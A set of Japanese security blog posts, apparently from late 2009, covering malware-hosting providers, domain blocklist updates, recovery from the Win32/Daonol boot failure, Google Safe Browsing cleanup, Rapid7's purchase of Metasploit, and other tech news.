少し前に 8080: インジェクションのホスティングとして LEASEWEBとTRUESERVER、KABELFOONの３つが名指しで挙げられ、StopBADware.orgより

abuse＠leaseweb.comへ

I’ve sent an email to Leaseweb and will continue to hunt for contacts at the other two organizations.

という具合でメール送信したようですが、おそらく返事はこないんじゃないかなぁ・・（苦笑）

More on .NL attacks

もうブロックするしかなさそうです（笑）

ブロックマニアのヒトは LEASEWEBはとっくの昔にBLOCKEDでしょうが・・・

----------

BlockList by DNS-BH

で、ブロックマニアに捧ぐ

Oct 24

scareware domains, botnet domains, fast flux domains

192 new domains to block. Sources include garwarner.blogspot.com, ddanchev.blogspot.com, and secuboxlabs.fr:

Oct 21

Fraud Domains, Trojan Domains, Rogue Domains

Over 200 new rogue, trojan, fraud domains to block. Sources include malwareurl.com, web2secure.com:

----------

月曜の朝なのでこんなもので・・・

----------

Google Safe Browsing STATUS:

| 1256500825 | B | [goog-black-hash 1.42990 update]

| 1256500807 | M | [goog-malware-hash 1.16710 update]

| 330015 | current blocked

| 854437 | total logged ... See all content Hide content

Reply

gnome 3 months, 3 weeks ago on Wordpress

国連デー

ツーバイフォー住宅の日

暗黒の木曜日

トリコロール記念日

----------

時間が無いので１個だけ（Favicon作ってる時間も無い）

電話お問い合わせ窓口の混雑について（お詫び）

パソコンの電源を入れても正常に起動せず、マウスカーソルだけが表示されます。

また、Safe Mode（セーフモード）でも起動することができない場合があります。

コンピュータウイルス「Win32/Daonol」に関するご注意

Windows® XPにおいて、起動時に Windows のロゴが表示された後、マウスカーソルのみとなり、その後の操作ができなくなります。 Windows のセーフモードでの起動も出来なくなります 。この現象は、マルウェアが起動中にデットロック状態になるために発生しています。

コンピュータウイルス「Torojan .Win32/Daonol.H」について

主にWindows XPにおいて、起動時、Windowsのロゴが表示された後、マウスポインタのみとなり、その後の操作ができなくなります。

Windowsのセーフモードでの起動も出来なくなります 。

Windowsロゴが出た後、真っ黒の画面にマウスカーソルだけ。

手動システム復元は何度かやったことがありますので、とにかく手順書をメンテ用PCで出しておいて、脳外科手術の開始です。

トリアージ３！？

DELL Vostro 200

起動はするのですが、Windowsロゴの後に画面が真っ暗のまま

先に進まない状態でした。キーボード入力も受け付けないので

その先に進みようがない。さらにはセーフモードでも同じ症状でした。

なんだかとってもイヤな事態になってますね・・

サポセンがパンクするってどんだけ？って感じなのですが、潜伏中だったbotnetが起床に失敗した（注入コードのエラー）のだとしたら、どれだけ深く潜伏してたんだ！？という感じです。

Revenge of Gumblar Zombies

Gumblar... Not Gumby!

とりあえず、真っ暗病になってしまったヒトは、手近なPCに詳しい方に「レジストリ破損時の回復コンソールの使い方がわかる？」と尋ねてみてください。

レジストリの破損により Windows XP を起動できなくなった場合の回復方法

修正すべきレジストリは

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Drivers32]

の aux(nnn)= midi(nnn)= の各エントリに妙なファイルが設定されている部分です。

黒い画面にマウスカーソル (Win32/Daonol)

----------

出かけてきます ... See all content Hide content

Reply

gnome 3 months, 4 weeks ago on Wordpress

電信電話記念日

津軽弁の日

1956年革命、および共和国宣言の記念日 ハンガリー

----------

Google Blockedになってしまったら？

もし、自分のサイトが陥落サイトになってしまったら？

Best Practices for Verifying and Cleaning up a Compromised Site

昨日も同じ話をしましたが、今日は Google 的な側面です。とりあえず、Google Safe Browsing の「攻撃サイト」警告を取り除かないとイロイロ支障があるでしょうしね・・・

Google Webmaster Tool で、何のマルウェアに感染しているのかという情報も確認することもできます。

要するに、Google Webmaster Tool のアカウントを持っていないとイザというときに右往左往して、解除に時間を食ってしまうということなのでしょうか

Google offers webmasters more malware details

----------

Rapid7がMetasploitを買収

Metasploitはシステム侵入検査（貫入試験）用のフレームワークで、Exploitsをパターン化して自動的に侵入を試みることができる機能を持っています。Rapid7社は NeXpose など、統合型貫入試験ソリューションを提供している会社で、このたび、Metasploitを買収しました。

Rapid7 snaps up the Metasploit Project

Metasploit + Rapid7 shakes up pen-test landscape

Rapid7 purchases Metasploit

さて、当然のことながら、このツールは悪用されると恐ろしいことになります。

Metasploit を使って脆弱性を発見する

Metasploit 3.0――ユーザの良心が試されるシステム貫入試験ツール -- 2007.05

ワーム「Conficker」，拡散にセキュリティ検証ツール「Metasploit」のペイロードを流用 -- 2009.01

この辺を読んでギクっときたシス管の方は、１回チェックをかけてみるのもいいかもしれません（ただし自分のサーバへ・笑）

----------

GoogleVoiceが公開されちゃったよ・・

About Voicemail and Privacy

一部がオンライン検索可能だったGoogle Voice--現在はグーグルが修正済

ボイスメールの情報をサイトに掲載するということは、そもそも他の人とその情報を共有しようと考えているということなので、われわれはユーザーがウェブ上に掲載したボイスメールメッセージに対するクローリングは制限していなかった。しかし、ユーザーがそれらのメッセージを自分のサイトには掲載したいが、自分のウェブサイトの外部から直接検索できて欲しくはないと考えることも確かに理解できる。このため、われわれはそれらのメッセージがクローリングされるのを制限し、サイトの所有者だけがそれらをインデックスに加えられるかどうかを判断できるように修正を加えた。

何か昔、GoogleMapsのマイマップでも似た事故があったような気が・・・

----------

身元を明かしたマルウェア作者

A black hat loses control

昨今の Malware作者は自分の身元を隠すことに心血を注いでいるはず・・ですよね？　でも違いました。とある Malware作者の立ち上げた（とみられる）新しいサービス（？）では、セキュリティ企業のオンラインスキャナのトラッキングを行い、その IPや情報をもってブロックするためのリストを提供したり、サービスそのものに対する DoS 攻撃ツールを提供したりしていました。

当然のことですが、この「攻撃ツール」とやらを実行すると、マルウェアはシステム内のユーザ情報などの環境をランダムな文字列に変更してしまいます。そしてマルウェア作者は正体を明らかにするとともに 2000 ユーロを要求してきました。我々（カスペルスキー）はこれらの情報全てを当社の顧問弁護士に送付する手続きを進行しています。

メッセージが口汚くてなんともいえませんね（苦笑）

----------

Google vs Apple ?

スクリーンショット入手！―Googleの音楽サービスはこんな雰囲気に

10/28を楽しみにしておきましょう。

----------

Windows7 now available!

Windows 7発売。秋葉原での深夜販売は大盛り上がり

周囲じゃ全然盛り上がってないような・・・

とりあえずファミリーパックでも買おうかな（笑）

----------

Google Safe Browsing STATUS:

| 1256241612 | B | [goog-black-hash 1.42774 update]

| 1256241603 | M | [goog-malware-hash 1.16638 update]

| 342521 | current blocked

| 843219 | total logged

EoF ... See all content Hide content

Reply

gnome 3 months, 4 weeks ago on Wordpress

現在、サーバがおかしい状態になっており、携帯でしか見えないような状態です（苦笑）

かくいう私も、FireMobileSimulator を使って書いています。

データベースは動いているようですので、復旧するのかどうかわかりませんが、公式から何もアナウンスがありませんので、どうすることもできません。

ちなみに、PCで見た場合、処理応答が停止してしまい、事実上のブラクラ状態となっております。

というわけで、どうしようにもない状況下にあることをお詫び申し上げます。

My Aplogize for any inconvenience.

Reply